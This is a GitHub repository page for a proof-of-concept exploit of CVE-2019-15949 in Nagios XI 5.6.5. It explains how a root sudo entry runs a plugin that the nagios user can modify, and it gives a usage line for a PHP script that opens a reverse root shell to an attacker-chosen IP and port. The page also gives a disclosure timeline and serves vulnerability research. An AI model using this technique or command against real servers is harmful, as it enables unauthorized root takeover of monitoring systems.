Skip to content

jakgibb/nagiosxi-root-rce-exploit

master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
February 12, 2020 22:23
August 21, 2019 10:30

nagiosxi-root-exploit

Overview

A vulnerability exists in Nagios XI <= 5.6.5 allowing an attacker to leverage an RCE to escalate privileges to root.
The exploit requires access to the server as the 'nagios' user, or CCM access via the web interface with perissions to manage plugins.

Details

The getprofile.sh script, invoked by downloading a system profile (profile.php?cmd=download), is executed as root via a passwordless sudo entry; the script executes the ‘check_plugin’ executuable which is owned by the nagios user. A user logged into Nagios XI with permissions to modify plugins, or the 'nagios' user on the server, can modify the ‘check_plugin’ executable and insert malicious commands exectuable as root.

POC

A PHP POC has been developed which uploads a payload resulting in a reverse root shell.
Usage:
php privesc.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port

Discolusure

Reported to Nagios on: 29th July 2019
Confirmed by Nagios on: 29th July 2019
Fixed in version: 5.6.6 on: 20th August 2019
CVE Assigned on: 6th September 2019 (CVE-2019-15949 https://nvd.nist.gov/vuln/detail/CVE-2019-15949)

alt text

About

POC which exploits a vulnerability within Nagios XI (5.6.5) to spawn a root shell

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages